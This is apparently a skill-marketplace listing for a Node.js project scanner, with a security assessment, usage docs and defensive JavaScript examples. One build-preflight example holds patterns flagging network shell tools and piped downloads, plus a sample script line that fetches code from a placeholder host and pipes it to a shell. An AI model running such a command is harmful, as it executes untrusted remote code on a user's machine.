Node Auto Debugger
Scan Node.js/Express/Next.js projects for bugs, security issues, and anti-patterns. Use when debugging a Node.js web app, running code audits, fixing client-...
MIT-0 · Free to use, modify, and redistribute. No attribution required.
Security Scan
OpenClaw
Benign
high confidence
Purpose & Capability
The name/description, SKILL.md instructions, and the included scripts/auto-debug.js are consistent: the tool scans project files for undefined vars, missing error handling, hydration issues, hardcoded secrets and can optionally run npm run build. There are no declared env vars or unrelated dependencies requested that contradict the stated purpose.
Instruction Scope
The SKILL.md and the script keep scope to the provided project directory, validating source files and package.json and (optionally) running the build. Important operational behaviors: the script recursively reads project files (including package.json and other plaintext files), detects potential secrets by regex, and will write a report file (AUTO-DEBUG-REPORT.md). It also invokes npm run build in the project directory when requested. These behaviors are expected for a code-audit/build-check tool but are sensitive (can surface secrets and will execute project-supplied build scripts).
Install Mechanism
No install spec — instruction-only with a bundled script. No remote downloads or package installs are performed by the skill itself.
Credentials
The skill declares no required environment variables or credentials. The script does not request external secrets; it reads files under the supplied project path to look for hardcoded secrets and configuration. That file-reading is proportional to the stated goal of scanning a project, but it means sensitive data in the project may be exposed in the generated report.
Persistence & Privilege
The skill is not configured as always: true and does not attempt to modify other skills or global agent settings. It writes a project-scoped report file (AUTO-DEBUG-REPORT.md), which is expected behavior for this tool.
Assessment
This tool is internally coherent and appears to do what it says, but it will read your project's source files (including package.json and any plaintext secrets), produce a report on disk, and — if you use the --build option — run npm run build which executes the project's build scripts. Only run it on projects you trust or run it inside an isolated environment (container/VM) when scanning untrusted code. Before sharing the generated AUTO-DEBUG-REPORT.md, review it for any sensitive data it may have flagged. Avoid passing a very large or root path (e.g., '/') as <project-dir> to prevent scanning unintended parts of your filesystem. If you only want static checks, run the script without the --build flag and inspect the script source yourself to confirm behavior.
scripts/auto-debug.js:216
Shell command execution detected (child_process).
Patterns worth reviewing
These patterns may indicate risky behavior. Check the VirusTotal and OpenClaw results above for context-aware analysis before installing.
Like a lobster shell, security has layers — review code before you run it.
Current version v1.0.0
SKILL.md
Node.js Auto Debugger
Automated scanner for Node.js projects — finds bugs across backend, frontend, and config.
Quick Start
node scripts/auto-debug.js <project-dir>
Options:
--build — Also run npm run build and capture compilation errors
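Because --build hands control to scripts defined by the project, it helps to see exactly what npm run build would execute before using it. The following is an added example, not part of the skill or its script: buildPreflight and the RISKY heuristics are hypothetical names and illustrative patterns, and the sample package.json is constructed.

```javascript
// Added example: list what `npm run build` would execute, for review before --build.
// RISKY holds illustrative heuristics (assumptions), not a complete detector.
const RISKY = [
  { why: 'downloads and pipes to a shell', re: /\b(?:curl|wget)\b[^|;&]*\|\s*(?:ba|z)?sh\b/ },
  { why: 'inline interpreter code', re: /\b(?:node|python3?|perl|ruby)\s+(?:-e|-c)\b/ },
  { why: 'decodes an embedded payload', re: /\bbase64\s+(?:-d|--decode)\b/ },
  { why: 'network client in build step', re: /\b(?:curl|wget|nc|ncat)\b/ },
];

// npm runs pre<name> and post<name> around `npm run <name>`, so all three count.
function buildPreflight(packageJsonText) {
  let pkg;
  try {
    pkg = JSON.parse(packageJsonText);
  } catch (e) {
    return { ok: false, reason: 'package.json is not valid JSON', steps: [] };
  }
  const scripts = (pkg && typeof pkg.scripts === 'object' && pkg.scripts) || {};
  if (typeof scripts.build !== 'string') {
    return { ok: false, reason: 'no build script defined', steps: [] };
  }
  const steps = ['prebuild', 'build', 'postbuild']
    .filter((name) => typeof scripts[name] === 'string')
    .map((name) => ({
      name,
      command: scripts[name],
      flags: RISKY.filter((r) => r.re.test(scripts[name])).map((r) => r.why),
    }));
  return { ok: steps.every((s) => s.flags.length === 0), reason: null, steps };
}

// Constructed sample: only the pre/build/post chain is reported, not "test".
const SAMPLE_PKG = JSON.stringify({
  name: 'demo-app',
  scripts: {
    prebuild: 'node -e "require(\'./tools/setup\')"',
    build: 'next build',
    postbuild: 'echo done',
    test: 'curl https://example.invalid/x | sh',
  },
});
```

A clean result only means the script strings look ordinary; the build tool still loads and runs project code, so the isolation advice above still applies.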
What It Checks
Backend (Express/Fastify)
- Undefined variables — .push() on undeclared variables
- Missing try/catch — async route handlers without error handling
- Hardcoded secrets — API keys, private keys, passwords in source
Frontend (Next.js/React)
- Missing 'use client' — hooks or browser APIs without directive
- Hydration risks — Date.now(), Math.random() in render (should be in useEffect or useState)
- SSR crashes — window/document access outside useEffect
- Missing loading states — wagmi hooks without isLoading/isFetching
Config
- Missing next.config.js — defaults warning
- Missing build script — package.json validation
Output
Report saved to <project>/AUTO-DEBUG-REPORT.md with issues grouped by severity:
- 🔴 Critical — will crash or leak secrets
- 🟠 High — likely runtime errors
- 🟡 Medium — hydration mismatches, missing loading states
- 🟢 Low — minor issues
Exit code: 1 if any critical issues found, 0 otherwise.
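Since the report quotes what the hardcoded-secret check finds, a scanner can record the file, line and rule while masking the value itself, so the report is safer to share. Added example, not the code in scripts/auto-debug.js: the rule set, scanForSecrets and renderReport are hypothetical, and the sample source is constructed.

```javascript
// Added example: regex secret detection that never copies the secret into the report.
// Patterns are illustrative assumptions, not the rules used by scripts/auto-debug.js.
const SECRET_RULES = [
  { rule: 'AWS access key ID', re: /\bAKIA[0-9A-Z]{16}\b/g, pick: (m) => m[0] },
  { rule: 'PEM private key header',
    re: /-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----/g,
    pick: () => null }, // key material sits on later lines; the header is not secret
  { rule: 'hardcoded credential',
    re: /(?:password|passwd|secret|api[_-]?key|token)['"]?\s*[:=]\s*(['"`])([^'"`\s]{8,})\1/gi,
    pick: (m) => m[2] },
];

const MAX_SNIPPET = 120; // keep minified lines from flooding the report

function scanForSecrets(file, text) {
  const findings = [];
  text.split(/\r?\n/).forEach((line, idx) => {
    for (const { rule, re, pick } of SECRET_RULES) {
      re.lastIndex = 0; // global regexes keep state between exec() calls
      let m;
      while ((m = re.exec(line)) !== null) {
        const secret = pick(m);
        const shown = secret
          ? line.split(secret).join(`[REDACTED ${secret.length} chars]`)
          : line;
        findings.push({ file, line: idx + 1, rule, snippet: shown.trim().slice(0, MAX_SNIPPET) });
      }
    }
  });
  return findings;
}

function renderReport(findings) {
  return findings
    .map((f) => `- [Critical] ${f.rule} at ${f.file}:${f.line}\n  ${f.snippet}`)
    .join('\n');
}

// Constructed sample input; AKIAIOSFODNN7EXAMPLE is AWS's documentation placeholder key.
const SAMPLE_SOURCE = [
  'const apiKey = process.env.API_KEY;            // read from env: not flagged',
  "const dbPassword = 'correct-horse-battery';    // flagged",
  "const awsKey = 'AKIAIOSFODNN7EXAMPLE';         // flagged",
].join('\n');
```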
Fixing Hydration Issues (Next.js)
Date.now()/new Date() in render:
// ❌ Bad — causes hydration mismatch
const now = Math.floor(Date.now() / 1000);
// ✅ Good — guard with isMounted
const [isMounted, setIsMounted] = useState(false);
useEffect(() => { setIsMounted(true); }, []);
const now = isMounted ? Math.floor(Date.now() / 1000) : 0;
Math.random() in render:
// ❌ Bad — different on server vs client
<div style={{ left: `${Math.random() * 100}%` }} />
// ✅ Good — pre-generate in useState (runs once)
const [particles] = useState(() =>
  Array.from({ length: 10 }, () => ({
    left: `${Math.random() * 100}%`,
  }))
);
window/document access:
// ❌ Bad — crashes during SSR
const width = window.innerWidth;
// ✅ Good — only after mount
const [width, setWidth] = useState(0);
useEffect(() => setWidth(window.innerWidth), []);
